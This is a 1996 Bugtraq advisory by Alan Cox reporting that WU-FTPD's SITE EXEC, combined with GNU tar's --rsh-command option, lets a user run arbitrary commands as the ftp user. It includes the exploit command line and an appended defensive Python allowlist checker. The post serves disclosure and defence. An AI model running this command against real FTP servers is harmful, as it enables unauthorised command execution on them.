[3214] in bugtraq
WU.FTPD vulnerability: gnu tar possibly others
daemon@ATHENA.MIT.EDU (Alan Cox)
Mon Aug 19 14:52:26 1996
Date: Mon, 19 Aug 1996 14:09:19 +0100
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
From: Alan Cox <coxa@cableol.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
quote site exec tar -c -v --rsh-command=commandtorunasftp -f somebox:foo foo
GNU tar allows you to specify which binary you wish to run.
Fix:
Use a dumber tar. Also carefully evaluate any other binaries
you have to avoid unpleasant and similar surprises.
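
Added example, not part of the original post: one way to evaluate what a SITE EXEC binary may be handed is an allowlist check that refuses every long option and any remote-style archive name. The function name `check_site_exec`, the `ALLOWED` policy and the sample commands are assumptions of this sketch; its input is the text that follows `site exec`.

```python
import shlex

# Hypothetical policy for this sketch: binaries reachable through SITE EXEC
# and the only single-letter options each one may receive.
ALLOWED = {"tar": set("cvtxf")}


def check_site_exec(command):
    """Return (allowed, reason) for the argument string of a SITE EXEC request."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        return False, f"unparseable command: {exc}"
    if not argv:
        return False, "empty command"
    prog, args = argv[0], argv[1:]
    if prog not in ALLOWED:
        return False, f"{prog!r} is not an approved binary"
    expect_archive = False
    for arg in args:
        if expect_archive:
            # GNU tar treats host:file as a remote archive and starts a helper
            # program to reach it, so a colon in the archive name is refused.
            if ":" in arg or arg.startswith("-"):
                return False, f"archive name {arg!r} rejected"
            expect_archive = False
        elif arg.startswith("--"):
            # Long options are refused wholesale; this covers --rsh-command.
            return False, f"long option {arg!r} rejected"
        elif arg.startswith("-"):
            cluster = arg[1:]
            bad = sorted(set(cluster) - ALLOWED[prog])
            if bad:
                return False, f"option letters {bad} rejected"
            if "f" in cluster:
                # Require the archive name as a separate, inspectable argument.
                if cluster.count("f") > 1 or not cluster.endswith("f"):
                    return False, "-f must end the option cluster"
                expect_archive = True
    if expect_archive:
        return False, "-f given without an archive name"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample requests; the first is the command from the post.
    for cmd in ("tar -c -v --rsh-command=commandtorunasftp -f somebox:foo foo",
                "tar -c -v -f somebox:foo foo",
                "tar -cvf backup.tar foo"):
        print(check_site_exec(cmd), cmd)
```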